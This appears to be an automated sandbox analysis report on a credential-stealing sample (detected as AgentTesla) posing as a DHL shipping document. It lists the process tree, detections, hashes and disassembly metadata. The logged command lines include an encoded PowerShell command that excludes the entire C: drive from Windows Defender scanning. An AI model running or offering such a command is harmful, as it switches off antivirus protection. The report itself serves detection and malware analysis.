                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.532957763.00000199242B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:low

                                                                                                                                            General

                                                                                                                                            Target ID:10
                                                                                                                                            Start time:11:33:40
                                                                                                                                            Start date:20/03/2023
                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==
                                                                                                                                            Imagebase:0x7ff737e40000
                                                                                                                                            File size:447488 bytes
                                                                                                                                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Target ID:11
                                                                                                                                            Start time:11:33:40
                                                                                                                                            Start date:20/03/2023
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff745070000
                                                                                                                                            File size:625664 bytes
                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Target ID:12
                                                                                                                                            Start time:11:33:57
                                                                                                                                            Start date:20/03/2023
                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
                                                                                                                                            Imagebase:0x7ff707bb0000
                                                                                                                                            File size:273920 bytes
                                                                                                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Target ID:13
                                                                                                                                            Start time:11:33:57
                                                                                                                                            Start date:20/03/2023
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff745070000
                                                                                                                                            File size:625664 bytes
                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Target ID:14
                                                                                                                                            Start time:11:33:57
                                                                                                                                            Start date:20/03/2023
                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
                                                                                                                                            Imagebase:0x7ff737e40000
                                                                                                                                            File size:447488 bytes
                                                                                                                                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Target ID:15
                                                                                                                                            Start time:11:33:59
                                                                                                                                            Start date:20/03/2023
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe"
                                                                                                                                            Imagebase:0xa0000
                                                                                                                                            File size:171520 bytes
                                                                                                                                            MD5 hash:B1DFD2B85A645040D8C89D0FCED4340A
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.555838851.000000000244C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.555838851.000000000244C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                            Reputation:low

                                                                                                                                            General

                                                                                                                                            Target ID:17
                                                                                                                                            Start time:11:34:06
                                                                                                                                            Start date:20/03/2023
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                                                            Imagebase:0x29405fd0000
                                                                                                                                            File size:40552 bytes
                                                                                                                                            MD5 hash:6EE3F830099ADD53C26DF5739B44D608
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.550292879.0000029407DCA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                            General

                                                                                                                                            Target ID:18
                                                                                                                                            Start time:11:34:15
                                                                                                                                            Start date:20/03/2023
                                                                                                                                            Path:C:\Users\user\AppData\Local\explorers.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\explorers.exe"
                                                                                                                                            Imagebase:0x1d807d30000
                                                                                                                                            File size:2802176 bytes
                                                                                                                                            MD5 hash:E2F0B0AFE1D1CABE6D0FC082FADDE43F
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                            • Detection: 38%, ReversingLabs

                                                                                                                                            General

                                                                                                                                            Target ID:19
                                                                                                                                            Start time:11:34:24
                                                                                                                                            Start date:20/03/2023
                                                                                                                                            Path:C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe"
                                                                                                                                            Imagebase:0x60000
                                                                                                                                            File size:171520 bytes
                                                                                                                                            MD5 hash:B1DFD2B85A645040D8C89D0FCED4340A
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.556924562.00000000023AC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.556924562.00000000023AC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                            • Detection: 100%, Joe Sandbox ML

                                                                                                                                            General

                                                                                                                                            Target ID:22
                                                                                                                                            Start time:11:34:32
                                                                                                                                            Start date:20/03/2023
                                                                                                                                            Path:C:\Users\user\AppData\Local\explorers.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\explorers.exe"
                                                                                                                                            Imagebase:0x29791ee0000
                                                                                                                                            File size:2802176 bytes
                                                                                                                                            MD5 hash:E2F0B0AFE1D1CABE6D0FC082FADDE43F
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                            General

                                                                                                                                            Target ID:23
                                                                                                                                            Start time:11:34:42
                                                                                                                                            Start date:20/03/2023
                                                                                                                                            Path:C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe"
                                                                                                                                            Imagebase:0x520000
                                                                                                                                            File size:171520 bytes
                                                                                                                                            MD5 hash:B1DFD2B85A645040D8C89D0FCED4340A
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000017.00000002.558518953.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000002.558518953.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                            Disassembly

                                                                                                                                            Reset < >

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:6.7%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:4
                                                                                                                                              Total number of Limit Nodes:0
                                                                                                                                              execution_graph 4780 7ffbad3c1835 4781 7ffbad3c184f 4780->4781 4782 7ffbad3c18f6 4781->4782 4783 7ffbad3c18c7 RtlEncodePointer 4781->4783 4783->4782

                                                                                                                                              Executed Functions

                                                                                                                                              Function 00007FFBAD3C1835 Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.541991764.00007FFBAD3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD3C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffbad3c0000_DHL_Shipping_Document2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EncodePointer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2118026453-0
                                                                                                                                              • Opcode ID: f20332a9421db829eff6c89dce21a679c47bcfe32c46c222fe1523387f9366b5
                                                                                                                                              • Instruction ID: 26e926ce7c43a87cd40dcee5559e4945bfe32e2d2822f1cb0289151bec6315a5
                                                                                                                                              • Opcode Fuzzy Hash: f20332a9421db829eff6c89dce21a679c47bcfe32c46c222fe1523387f9366b5
                                                                                                                                              • Instruction Fuzzy Hash: 3E31047190DB984FE7669B7D88193B5BBE0EF66321F40417FD08EC3192EA78A8098711
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD3C1BE1 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.541991764.00007FFBAD3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD3C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffbad3c0000_DHL_Shipping_Document2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EncodePointer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2118026453-0
                                                                                                                                              • Opcode ID: 771c58b2f15c4316b1ac28dc255a8efe7d80042ab20a3257c6b33f7ee3fa683b
                                                                                                                                              • Instruction ID: 083f4b4d0acb9aa0295d73d9c2c990b3fd47e37d08aad838b33cbdac042898f8
                                                                                                                                              • Opcode Fuzzy Hash: 771c58b2f15c4316b1ac28dc255a8efe7d80042ab20a3257c6b33f7ee3fa683b
                                                                                                                                              • Instruction Fuzzy Hash: 5C31E87190DB484FE751EB798C193A9BBE0EB56320F04417EE0CAC31A3DA649819C752
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD550B0D Relevance: .1, Instructions: 85COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 432 7ffbad550b0d-7ffbad550b8b 436 7ffbad550b92-7ffbad550ba6 432->436 437 7ffbad550b8d 432->437 439 7ffbad550bad-7ffbad550bca 436->439 437->436
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.544346984.00007FFBAD550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD550000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffbad550000_DHL_Shipping_Document2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d7ff9f85341c8df302eb644fbc61b479d39da8005946a8ba1e979efc0b727aff
                                                                                                                                              • Instruction ID: 6a796a9b4154aed9f2ac7d4e19a6fe6c1d822148a15720873e24d7c099110692
                                                                                                                                              • Opcode Fuzzy Hash: d7ff9f85341c8df302eb644fbc61b479d39da8005946a8ba1e979efc0b727aff
                                                                                                                                              • Instruction Fuzzy Hash: 0621C37180E7C98FEF53DFB888591A87FE0EF56211F4940E6D888CB1A3E9285816C741
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Non-executed Functions

                                                                                                                                              Function 00007FFBAD3C29A3 Relevance: .5, Instructions: 508COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.541991764.00007FFBAD3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD3C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffbad3c0000_DHL_Shipping_Document2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c4f185a6f5e8d417f41ca5c61f6b98cb20d717857e19b4a4e3612585f10fd3b7
                                                                                                                                              • Instruction ID: 9989f3d8454b5dc9c4bb8152b2b4e1ece1711f32ca7836bc6a32ced0809e3643
                                                                                                                                              • Opcode Fuzzy Hash: c4f185a6f5e8d417f41ca5c61f6b98cb20d717857e19b4a4e3612585f10fd3b7
                                                                                                                                              • Instruction Fuzzy Hash: E6C1D22FA481760ADA11B6BDF5814EDA760EFC23327344137D386DA0538E68A5DF92F0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD3C0C00 Relevance: .1, Instructions: 104COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.541991764.00007FFBAD3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD3C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffbad3c0000_DHL_Shipping_Document2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f7945c81befc76ed2f57f6ce2b2eb30c9d755c0156f8c2a21688bd662f6480f5
                                                                                                                                              • Instruction ID: 814838c5b7fbe1eb54fd1a46d179dcc6957f7f1cb97fae84c65e862621707e5f
                                                                                                                                              • Opcode Fuzzy Hash: f7945c81befc76ed2f57f6ce2b2eb30c9d755c0156f8c2a21688bd662f6480f5
                                                                                                                                              • Instruction Fuzzy Hash: 5721D74FA4D4BA06DF21B97DB5090EAA794EF91332B600437DB4ADA0439D24B8DF81F4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:16.1%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:33.3%
                                                                                                                                              Total number of Nodes:9
                                                                                                                                              Total number of Limit Nodes:0
                                                                                                                                              execution_graph 11817 22df6e0 11819 22df741 GetUserNameW 11817->11819 11820 22df82d 11819->11820 11821 22d5ad0 11822 22d5aee 11821->11822 11825 22d5a64 11822->11825 11824 22d5b25 11826 22d75f0 LoadLibraryA 11825->11826 11828 22d76e9 11826->11828

                                                                                                                                              Executed Functions

                                                                                                                                              Function 022DF6E0 Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 244 22df6e0-22df73f 245 22df7aa-22df7ae 244->245 246 22df741-22df76c 244->246 247 22df7d9-22df7e4 245->247 248 22df7b0-22df7d3 245->248 253 22df79c 246->253 254 22df76e-22df770 246->254 250 22df7e6-22df7ee 247->250 251 22df7f0-22df82b GetUserNameW 247->251 248->247 250->251 255 22df82d-22df833 251->255 256 22df834-22df84a 251->256 261 22df7a1-22df7a4 253->261 257 22df792-22df79a 254->257 258 22df772-22df77c 254->258 255->256 259 22df84c-22df858 256->259 260 22df860-22df887 256->260 257->261 264 22df77e 258->264 265 22df780-22df78e 258->265 259->260 268 22df889-22df88d 260->268 269 22df897 260->269 261->245 264->265 265->265 270 22df790 265->270 268->269 271 22df88f 268->271 272 22df898 269->272 270->257 271->269 272->272
                                                                                                                                              APIs
                                                                                                                                              • GetUserNameW.ADVAPI32(00000000,00000000), ref: 022DF81B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000F.00000002.554704996.00000000022D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_15_2_22d0000_Lutyzivrgpnlssvvvftlfile.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: NameUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2645101109-0
                                                                                                                                              • Opcode ID: cb0256aee18fc41e2f65a52757cb9fa4ef6fdb670511437b3712313e4b3d6af7
                                                                                                                                              • Instruction ID: 4a67b40184c36d343ad57b850c08a4faf63a0f41b29a165e5d7eb4908234fd7a
                                                                                                                                              • Opcode Fuzzy Hash: cb0256aee18fc41e2f65a52757cb9fa4ef6fdb670511437b3712313e4b3d6af7
                                                                                                                                              • Instruction Fuzzy Hash: 6C513370D102198FDB14CFA9C988BDDBBB5BF48314F148129E81AAB798D7749844CF95
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 022DF6D4 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 214 22df6d4-22df73f 216 22df7aa-22df7ae 214->216 217 22df741-22df76c 214->217 218 22df7d9-22df7e4 216->218 219 22df7b0-22df7d3 216->219 224 22df79c 217->224 225 22df76e-22df770 217->225 221 22df7e6-22df7ee 218->221 222 22df7f0-22df82b GetUserNameW 218->222 219->218 221->222 226 22df82d-22df833 222->226 227 22df834-22df84a 222->227 232 22df7a1-22df7a4 224->232 228 22df792-22df79a 225->228 229 22df772-22df77c 225->229 226->227 230 22df84c-22df858 227->230 231 22df860-22df887 227->231 228->232 235 22df77e 229->235 236 22df780-22df78e 229->236 230->231 239 22df889-22df88d 231->239 240 22df897 231->240 232->216 235->236 236->236 241 22df790 236->241 239->240 242 22df88f 239->242 243 22df898 240->243 241->228 242->240 243->243
                                                                                                                                              APIs
                                                                                                                                              • GetUserNameW.ADVAPI32(00000000,00000000), ref: 022DF81B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000F.00000002.554704996.00000000022D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_15_2_22d0000_Lutyzivrgpnlssvvvftlfile.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: NameUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2645101109-0
                                                                                                                                              • Opcode ID: 88a69096655cc2b69f15e9e5913fd177c8d7531cfcca50a6482046db3d7315d1
                                                                                                                                              • Instruction ID: 35670f9de1e59c1c4db6ca243159f45e40318a3faa45196626000dd8a8983657
                                                                                                                                              • Opcode Fuzzy Hash: 88a69096655cc2b69f15e9e5913fd177c8d7531cfcca50a6482046db3d7315d1
                                                                                                                                              • Instruction Fuzzy Hash: 92512474D102198FEB14CFA9C988BDDBBB1BF48314F148129E81ABB798D7749844CF95
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 022D5A64 Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 407 22d5a64-22d7647 409 22d7649-22d766e 407->409 410 22d769b-22d76e7 LoadLibraryA 407->410 409->410 415 22d7670-22d7672 409->415 413 22d76e9-22d76ef 410->413 414 22d76f0-22d7721 410->414 413->414 420 22d7731 414->420 421 22d7723-22d7727 414->421 417 22d7695-22d7698 415->417 418 22d7674-22d767e 415->418 417->410 422 22d7680 418->422 423 22d7682-22d7691 418->423 426 22d7732 420->426 421->420 425 22d7729 421->425 422->423 423->423 424 22d7693 423->424 424->417 425->420 426->426
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000F.00000002.554704996.00000000022D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_15_2_22d0000_Lutyzivrgpnlssvvvftlfile.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                              • Opcode ID: 60e5df5cfbe3fc9e482f08de84634297342eb9828fb82b59815fede428b433d1
                                                                                                                                              • Instruction ID: 8c0895b7b1da9128f26b2ec8b02ddd77d7c6ff1ea40b730ed829150125a74f66
                                                                                                                                              • Opcode Fuzzy Hash: 60e5df5cfbe3fc9e482f08de84634297342eb9828fb82b59815fede428b433d1
                                                                                                                                              • Instruction Fuzzy Hash: 7A414874D106098FEB10CFE9C98479EFBF5EB48314F108529E815AB388E7B89845CF91
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 022D75E5 Relevance: 1.6, APIs: 1, Instructions: 95libraryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 427 22d75e5-22d7647 429 22d7649-22d766e 427->429 430 22d769b-22d76e7 LoadLibraryA 427->430 429->430 435 22d7670-22d7672 429->435 433 22d76e9-22d76ef 430->433 434 22d76f0-22d7721 430->434 433->434 440 22d7731 434->440 441 22d7723-22d7727 434->441 437 22d7695-22d7698 435->437 438 22d7674-22d767e 435->438 437->430 442 22d7680 438->442 443 22d7682-22d7691 438->443 446 22d7732 440->446 441->440 445 22d7729 441->445 442->443 443->443 444 22d7693 443->444 444->437 445->440 446->446
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000F.00000002.554704996.00000000022D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_15_2_22d0000_Lutyzivrgpnlssvvvftlfile.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                              • Opcode ID: 70eef314e76e2575bc4b8d3639be3488d1bda43ea94a4df1d0fe8dd10b146f89
                                                                                                                                              • Instruction ID: 55660511b185512519cbbfdc921bc2e8e405c6ad1410c32c558ddc898ed40749
                                                                                                                                              • Opcode Fuzzy Hash: 70eef314e76e2575bc4b8d3639be3488d1bda43ea94a4df1d0fe8dd10b146f89
                                                                                                                                              • Instruction Fuzzy Hash: B84147B4D102498FDB10CFA9C98479EFBF1EB48314F108529E815AB388E7789842CF91
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0099D006 Relevance: .1, Instructions: 78COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000F.00000002.553330658.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_15_2_99d000_Lutyzivrgpnlssvvvftlfile.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 49ee2d447cb5f53f893119b7b80a8db1dfb8d9bccb686c042efbba5b7a369c8b
                                                                                                                                              • Instruction ID: 7d77b5c3609308ab8339157014ae9b4fd29708879eaece3ba3135fb536420383
                                                                                                                                              • Opcode Fuzzy Hash: 49ee2d447cb5f53f893119b7b80a8db1dfb8d9bccb686c042efbba5b7a369c8b
                                                                                                                                              • Instruction Fuzzy Hash: 51316D7550E3C49FCB138B24D994715BF75AB46314F2985DBD8848F2A3C33A980ACB62
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0098D4D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000F.00000002.553067403.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_15_2_98d000_Lutyzivrgpnlssvvvftlfile.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 92d05017f69c9fd1963d56720fcf9f1f15ed7f2ce11257a27e2e476927b6d1a1
                                                                                                                                              • Instruction ID: b0d5f7f48e6857e55d1e22621f69cc83feaf04ba4e7d0790f62b78d4106618b1
                                                                                                                                              • Opcode Fuzzy Hash: 92d05017f69c9fd1963d56720fcf9f1f15ed7f2ce11257a27e2e476927b6d1a1
                                                                                                                                              • Instruction Fuzzy Hash: AA212876500244DFDB05EF18D9C0F17BF65FB98328F24856AE8054B39AC33AD855CBA2
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0098D124 Relevance: .1, Instructions: 75COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000F.00000002.553067403.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_15_2_98d000_Lutyzivrgpnlssvvvftlfile.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ffc5585e3af8c69387f8861c23f66b4455780d0e8d8df3d35b5fba797130132f
                                                                                                                                              • Instruction ID: 0fb20770f3432ce37aabd3a0e2f342799554419d604d2ec39f313eb272c1a6a9
                                                                                                                                              • Opcode Fuzzy Hash: ffc5585e3af8c69387f8861c23f66b4455780d0e8d8df3d35b5fba797130132f
                                                                                                                                              • Instruction Fuzzy Hash: 40210676508244DFDB09EF14D9C4F16BF65FF94314F248569E8054B386C33AD855C7A1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0099D030 Relevance: .1, Instructions: 72COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000F.00000002.553330658.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
